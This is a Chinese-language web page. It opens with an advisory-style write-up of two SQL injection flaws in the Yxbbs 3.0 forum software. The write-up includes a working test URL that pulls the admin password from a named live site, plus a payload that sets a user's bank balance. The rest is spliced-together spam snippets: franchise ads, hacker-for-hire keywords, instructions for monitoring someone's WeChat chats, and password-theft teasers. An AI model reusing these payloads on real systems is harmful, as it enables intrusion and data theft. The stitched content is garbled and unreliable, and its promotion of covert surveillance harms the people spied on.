影响版本:Yxbbs3.0漏洞描述:yxbbs在用户注册时,会实时检测用户名是否已存在以及用户名是否合法,不过服务端在检测时,对用户提交数据检验不够,本来人性化的一个功能,引入了一个注入点。具体涉及文件See.asp,对用户提交的 name = unescape(Request("name")) 并未做任何检验。 测试URL: http://www.yimxu.com/bbs/See.Asp?Action=CheckName&name=yxbbs' and (select top 1 asc(mid(password,1,1)) from yx_admin)>56 and '1'='1 //官方已经修补 第二处: 在Usersetup.asp中,有一个数字类型的变量,被当成文本检验过滤了,从而造成了一个SQL注入漏洞。 问题出在 Sex=yxbbs.Fun.GetStr("Sex") ,在Yx_Cls.asp里定义了GetStr这个 *** ,里面其实对于通常注入来说,有效的只是过滤了单引号。而在下面没有再对Sex进行任何检验,就参与SQL语句执行了: YxBBs.execute("update [YX_User] set Birthday='"&Birthday&"',Sex="&Sex&",PicW="&PicW&",PicH="&PicH&",Mail='"&Mail&"', *** ='"& *** &"',Honor='"&Honor&"',Pic='"&PicUrl&"',Home='"&Home&"',Sign='"&Sign&"',Is *** pic="&Isqqpic&" where name='"&YxBBs.MyName&"' And Password='"&YxBBs.MyPwd&"'") 如果是mssql数据库版本的,支持多步语句,那这个漏洞就是致命的。如果是access版本,那危害就小的多了,也就是改改参数吧。比如,可以给自己银行增加点存款,那sex就是 1,BankSave=9999999,修改完资料,银行存款就变9999999了。
冰淇淋的市场在不断的发展中,目前还是非常的受欢迎的,并且没有过度饱和,想要创业的你冰淇淋行业可以成为你很好的选择哦。BQ甜筒冰淇淋加盟更是行业中的知名品牌,走在大街上,总是能够看到BQ甜筒冰淇淋店铺的...
2月3日下午,由暨南大学附属穗华口腔医院独家荣誉出品、金网奖最佳导演首部家庭温情微电影《妈,吃饭了》在广州沃美影城上线开播,吸引了近200余名市民前来观影。 成人的世界没有容...
漏洞思路怎么找黑客 1、接单黑客也是赛博朋克电影的拓展者,漏洞思路接单qq吴君如,手机。二者有较大差别,网上黑客黑洞来,美国黑客组织P接单 oizonBox不断袭击中国网站,小游戏。in。各种安全协议...
现在中国的微信真的很恼火,因为越来越多的人使用这个社交软件,但是仍然有很多人对这样的应用持怀疑态度,例如,很多人担心它的定位系统,很多人担心它的视频系统等等。 如何监控别人的微信聊天记录 1.那么...
1、黑客的技术真的很厉害,媒体也经常有报道黑客如何如何厉害,窃取了什么机密等。2、千万不要去联系黑客,因为被骗的几率很大,网上很多都是假黑。 1、获取口令这又有三种方法:一是通过网络监听非法得到用户口...
依据这几位研讨人员发布的论文,这三个缝隙分别是Torpedo、Piercer和IMSI-Cracking,可用于阻拦电话以及盯梢手机用户方位。 其间最为严峻的是Torpedo,它利用了蜂窝寻呼协议(p...